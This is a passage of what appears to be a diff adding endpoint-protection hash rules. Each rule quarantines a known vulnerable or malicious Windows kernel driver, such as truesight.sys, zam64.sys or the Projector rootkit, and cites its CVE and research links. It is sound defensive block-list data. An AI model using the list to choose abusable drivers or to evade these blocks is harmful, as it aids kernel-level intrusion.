"2026-03-23T11:45:29.975026Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975032Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ef0dbc4c4735f30e96e16375b18c2f5fa58e15ef60d17786e39e616a4438e264", + "comment": "Trend Micro 
Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e35bd3e-2d1b-5cb5-8803-2e60722dbbf3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829487Z", + "creation_date": "2026-03-23T11:45:31.829489Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829495Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "39af2d3c5bd48f671489db694c1dd7be6dc00165ec687f27f53ce95e7cb2fc29", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e3a3cf0-ae6b-5c4c-b790-d1e8fbb8c8ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968040Z", + "creation_date": "2026-03-23T11:45:29.968042Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968048Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8fb3d3db095920345cafc55821598b4f46f8d756caf2f18016e331e5567e6a41", + "comment": "Projector Rootkit malicious drivers (aka KB_VRX_deviced.sys) [https://twitter.com/struppigel/status/1551503748601729025] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e3bd893-fdf3-519f-ba35-55ad7518ca9f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499001Z", + "creation_date": "2026-03-23T11:45:31.499004Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499012Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2600f0baa96e447adb3469e95ddbd8bc103c9ae9ee2ed123007873070fb545c7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e41d856-0158-5e56-be83-8d566d129170", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618339Z", + "creation_date": "2026-03-23T11:45:29.618341Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618346Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eef68fdc5df91660410fb9bed005ed08c258c44d66349192faf5bb5f09f5fa90", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e43783f-f0fb-5a31-93ff-9c8be54f89ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.471626Z", + "creation_date": "2026-03-23T11:45:31.471629Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.471638Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fe3256ba26e1b2b60ab1e4fd61196a8fc4a341b2eef7ff9582590c27b682f439", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e44ed3d-6027-5b0a-b1d5-b129ff708b72", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816602Z", + "creation_date": "2026-03-23T11:45:31.816606Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816614Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8159cd1a161eb79c7e2ae361dbbfa24f4b8a30c64679b4b1618acd2f0225d126", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e452da1-6856-58fd-8d1d-6715c6d74516", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817506Z", + "creation_date": "2026-03-23T11:45:30.817508Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817513Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2288c418ddadd5a1db4e58c118d8455b01fd33728664408ce23b9346ae0ca057", + "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e4ac328-0684-5a4c-a0a6-176ff72bfc5b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821786Z", + "creation_date": "2026-03-23T11:45:30.821790Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821798Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "182bbdb9ecd3932e0f0c986b779c2b2b3997a7ca9375caa2ec59b4b08f4e9714", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e597db8-a91a-5341-a859-e143a8ecd618", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811399Z", + "creation_date": "2026-03-23T11:45:31.811401Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811407Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1209cbe84d04f0c752cf1dcf4ab861a4563272f939fbd2cbf8b83ac5a2901597", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e62efd7-d2a1-5e88-945a-fff000326685", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810309Z", + "creation_date": "2026-03-23T11:45:31.810311Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810316Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4e09d1f618b48463045f84d6c5998ef060edfd07ff83fa8d44d136ca01a7dcae", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e69fc38-b6ed-5075-aed7-369b17f69fb3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142688Z", + "creation_date": "2026-03-23T11:45:32.142690Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.142696Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "97ba73eea08c19478189d5c07b48c250a68cd7652517ba8b2633e8c2d1ee2b4c", 
+ "comment": "Vulnerable IKARUS anti.virus Driver (aka ntguard.sys and ntguard_x64.sys) [https://www.greyhathacker.net/?p=995, https://www.exploit-db.com/exploits/43139] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e6b3436-7b54-5904-a761-56c3827153f7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982695Z", + "creation_date": "2026-03-23T11:45:29.982697Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982703Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "727e8ba66a8ff07bdc778eacb463b65f2d7167a6616ca2f259ea32571cacf8af", + "comment": "Vulnerable Kernel Driver (aka AsrSetupDrv103.sys) [https://www.loldrivers.io/drivers/19003e00-d42d-4cbe-91f3-756451bdd7da/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e6d5bbf-b262-5c05-b01d-4e8d240ce0c0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.459431Z", + "creation_date": "2026-03-23T11:45:30.459434Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459443Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "81bcd8a3f8c17ac6dc4bad750ad3417914db10aa15485094eef0951a3f72bdbd", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e791d8a-cd10-56b3-a2e4-7a29186d8c1d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971633Z", + "creation_date": "2026-03-23T11:45:29.971635Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971641Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dcf9bc1e511993fd8c87b8cab5c23366cc818cccc40617cabc8f242d4a8751d7", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + 
"id": "7e7d9b00-d6b0-5e3d-82f9-b0214ddc989b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811993Z", + "creation_date": "2026-03-23T11:45:31.811995Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812000Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d404dd8e5a851912403e7d444819d4930435377b112fe4ca56368e46617cf14", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e8c1a8b-1dee-5208-a8e4-282424b5c636", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145151Z", + "creation_date": "2026-03-23T11:45:32.145153Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145158Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c308aede12fefb8145c015a97d7844106df5469de97773cba3bd3d772dc7d24", + "comment": "Malicious Kernel Driver (aka driver_5c308aed.sys) [https://www.loldrivers.io/drivers/647f72e7-f378-4908-946c-5e45fab448e8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e999679-f7bd-5b0f-a43a-07bc485d162c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462642Z", + "creation_date": "2026-03-23T11:45:30.462645Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462654Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2d36642135166bbb296624dca878925963c7da785e42e940f02d01beb7c477d5", + "comment": "Vulnerable Kernel Driver (aka asio64.sys) [https://www.loldrivers.io/drivers/8b9d1a29-f5f4-4ce6-8fe2-5709123f7b86/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ea04c9f-d96f-56f4-948c-c448d6b770e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968114Z", + "creation_date": "2026-03-23T11:45:29.968116Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968121Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "002fb91a8ed384fa2bb8b72ee3a31c58f5fe73c7ebafc8255e598753b7613dd8", + "comment": "Projector Rootkit malicious drivers (aka KB_VRX_deviced.sys) [https://twitter.com/struppigel/status/1551503748601729025] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7eb2126d-c54d-5e8c-8e42-c6864bac51d4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604205Z", + "creation_date": "2026-03-23T11:45:29.604207Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604213Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1933f27ebebde55942291381219497019077548a074e8dcdb120c94df1a2489e", + 
"comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7eb62d52-aaef-5331-90f6-13c6d3da1674", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455920Z", + "creation_date": "2026-03-23T11:45:30.455924Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455933Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3e62730949b6cbbaf938d9b2015fe1b84eb63322c4287d0ce2b4c6f987c2dadd", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ec10a45-fc42-5993-96d7-60c3a8b8fb6c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499693Z", + "creation_date": 
"2026-03-23T11:45:31.499697Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499705Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4820e2269e711eb8c8656691cefc36c344f36611ba50f6a1ca772c2c924260aa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ec3b3af-0036-5f0f-b22a-b25b4859bb03", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827471Z", + "creation_date": "2026-03-23T11:45:30.827473Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827479Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d06ad26e336360720834394c105e5ff6a982bffb2f1b17633de12a5accda462d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "7ec446e8-687c-59e5-a07c-4f16bcae06a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824933Z", + "creation_date": "2026-03-23T11:45:31.824937Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824946Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d2a3cafd51ef8ee390332285607bc138f0eb14794c6b3651b0c53fb56fe964ee", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ed0dfb1-b1f0-567e-a0e5-7a0732f7f75f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147570Z", + "creation_date": "2026-03-23T11:45:31.147572Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
